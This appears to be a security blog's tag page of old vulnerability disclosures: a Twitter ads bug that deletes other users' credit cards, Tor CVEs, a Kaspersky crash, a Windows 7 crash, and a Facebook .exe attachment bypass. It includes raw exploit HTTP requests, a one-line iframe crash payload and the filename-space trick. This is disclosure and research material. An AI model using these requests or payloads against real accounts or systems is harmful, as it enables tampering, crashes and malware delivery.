Posts tagged: Bugs

Sep 16 2014

Twitter Vulnerability Allows Hacker to Delete Credit Cards from any Account

Twitter Delete Credit Card VulnerabilityAt the beginning of this month, just like other social networks, Twitter also started paying individuals for any flaws they uncover on its service with a fee of $140 or more offered per flaw under its new Bug Bounty program, and here comes the claimant.

An Egyptian Security Researcher, Ahmed Aboul-Ela, who have been rewarded by many reputed and popular technology giants including Google, Microsoft and Apple, have discovered a critical vulnerability in Twitter’s advertising service that allowed him deleting credit cards from any Twitter account.

Actually he found two vulnerabilities not one but both was having the same effect and impact.

#First Vulnerability
The first vulnerability he had spotted was in the delete functionality of credit cards in payments method page

https://ads.twitter.com/accounts/[account id]/payment_methods

Twitter Vulnerability Delete Credit Card

When he choose to delete credit card and press on the delete button, an ajax POST request is sent to the server like the following:

POST /accounts/18ce53wqoxd/payment_methods/destroy HTTP/1.1
Host: ads.twitter.com
Connection: keep-alive
Content-Length: 29
Accept: /
Origin: https://ads.twitter.com
X-CSRF-Token: Lb6HONDceN5mGvAEUvCQNakJUspD60Odumz/trVdQfE=
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.94 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: https://ads.twitter.com/accounts/18ce53wqoxd/payment_methods
Accept-Encoding: gzip,deflate
Accept-Language: en-US,en;q=0.8
Cookie: [cookies here]
account=18ce53wqoxd&id=219643

There are only two post parameters sent in request body-
account: the twitter account id
id: the credit card id and it’s numerical without any alphabetic characters

All he had to do is to change those two parameters to his twitter account id and credit card id, then reply again the request and he suddenly found that credit card have been delete from the other twitter account without any required interaction.

The funny part that the page response was “403 forbbiden” but the credit card was actually deleted from the account :D

#Second Vulnerability
Aboul-Ela found another similar vulnerability but this time the impact was higher than the previous one.
when he tried to add an invalid credit card to his twitter account it displayed an error message

“we were unable to approve the card you entered” and show a button called “Dismiss”

Hacking Twitter Delete Credit Cards

When he pressed on the Dismiss button the credit card was disappeared from his account, so he thought it have the same effect of deleteing, so he tried to add invalid credit card again and intercepted the request which looks like the following:

POST /accounts/18ce53wqoxd/payment_methods/handle_failed/220152 HTTP/1.1
Host: ads.twitter.com
Connection: keep-alive
Content-Length: 108
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: https://ads.twitter.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.94 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: https://ads.twitter.com/accounts/18ce53wqoxd/payment_methods
Accept-Encoding: gzip,deflate
Accept-Language: en-US,en;q=0.8
Cookie: [Cookies Here]
utf8=%E2%9C%93&authenticity_token=Lb6HONDceN5mGvAEUvCQNakJUspD60Odumz%2FtrVdQfE%3D
&id=220152&dismiss=Dismiss

This time account parameter doesn’t exists and only credit card id is used.

So he changed the id in the url and body to his credit card id from other twitter account then replied the request, and guess what?
Credit card got deleted from the other twitter account !

VIDEO DEMONSTRATION:

Jan 23 2012

Tor – Multiple Vulnerabilities

Tor LogoMultiple vulnerabilities have been found in Tor, the most severe of which may allow a remote attacker to execute arbitrary code.

Multiple vulnerabilities have been discovered in Tor:

  • When configured as client or bridge, Tor uses the same TLS certificate chain for all outgoing connections (CVE-2011-2768).
  • When configured as a bridge, Tor relays can distinguish incoming bridge connections from client connections (CVE-2011-2769).
  • An error in or/buffers.c could result in a heap-based buffer overflow (CVE-2011-2778).

Impact:
A remote attacker could possibly execute arbitrary code or cause a Denial of Service. Furthermore, a remote relay the user is directly connected to may be able to disclose anonymous information about that user or enumerate bridges in the user’s connection.

Vulnerable Versions:
< 0.2.2.35

Workaround:
There is no known workaround at this time.

Resolution:
All Tor users should upgrade to the latest version:

# emerge –sync
# emerge –ask –oneshot –verbose “>=net-misc/tor-0.2.2.35″

References:
CVE-2011-2768
CVE-2011-2769
CVE-2011-2778

Dec 22 2011

Kaspersky Internet Security – Memory Corruption Vulnerability

Kaspersky VulnerabilityVulnerability-Lab Team discovered a Memory & Pointer Corruption Vulnerability on Kaspersky Internet Security 2011/2012 & Kaspersky Anti-Virus 2011/2012.

Details:
The vulnerability is caused by an invalid pointer corruption when processing a corrupt .cfg file through the kaspersky exception filters, which could be exploited by attackers to crash the complete software process.
The bug is located over the basegui.ppl & basegui.dll when processing a .cfg file import.

Vulnerable Modules:
[+] CFG IMPORT

Affected Version(s):
– Kaspersky Anti-Virus 2012 & Kaspersky Internet Security 2012
– KIS 2012 v12.0.0.374
– KAV 2012 v12.x

– Kaspersky Anti-Virus 2011 & Kaspersky Internet Security 2011
– KIS 2011 v11.0.0.232 (a.b)
– KAV 11.0.0.400
– KIS 2011 v12.0.0.374

– Kaspersky Anti-Virus 2010 & Kaspersky Internet Security 2010

Severity:
Medium

Credits:
Vulnerability Research Laboratory – Benjamin K.M. (Rem0ve)

Original Advisory:
http://www.vulnerability-lab.com/get_content.php?id=129
http://www.vulnerability-lab.com/get_content.php?id=19

Dec 21 2011

Windows-7 Memory Corruption Vulnerability

Windows Memory CorruptionA vulnerability has been discovered in Microsoft Windows, which can be exploited by malicious people to potentially compromise a user’s system.

The vulnerability is caused due to an error in win32k.sys and can be exploited to corrupt memory via e.g. a specially crafted web page containing an IFRAME with an overly large “height” attribute viewed using the Apple Safari browser.

Successful exploitation may allow execution of arbitrary code with kernel-mode privileges.

The vulnerability is confirmed on a fully patched Windows 7 Professional 64-bit.
Other versions may also be affected.

Solution:
No effective solution is currently available.

Discovered By:
webDEViL

Original Advisory:
https://twitter.com/#!/w3bd3vil/status/148454992989261824

<iframe height=’18082563′></iframe> causes a BSoD on win 7 x64 via Safari. Lol!

Oct 27 2011

Facebook Attach EXE Vulnerability

Summary:
When using the Facebook ‘Messages’ tab, there is a feature to attach a file. Using this feature normally, the site won’t allow a user to attach an executable file. A bug was discovered to subvert this security mechanisms. Note, you do NOT have to be friends with the user to send them a message with an attachment.

Description:
When attaching an executable file, Facebook will return an error message stating:
“Error Uploading: You cannot attach files of that type.”

Facebook Error Uploading

When uploading a file attachment to Facebook we captured the web browsers POST request being sent to the web server. Inside this POST request reads the line:

Content-Disposition: form-data; name=”attachment”; filename=”cmd.exe”

It was discovered the variable ‘filename’ was being parsed to determine if the file type is allowed or not.

To subvert the security mechanisms to allow an .exe file type, we modified the POST request by appending a space to our filename variable like so:

filename=”cmd.exe ”

Facebook Post Hack

This was enough to trick the parser and allow our executable file to be attached and sent in a message.

Facebook Hot Stuff

Impact:
Potentially allow an attacker to compromise a victim’s computer system.

Affected Products:
www.facebook.com

Time Table:
09/30/2011 Reported Vulnerability to the Vendor
10/26/2011 Vendor Acknowledged Vulnerability
10/27/2011 Publicly Disclosed

Credits:
Discovered by Nathan Power
www.securitypentest.com

Execution POC: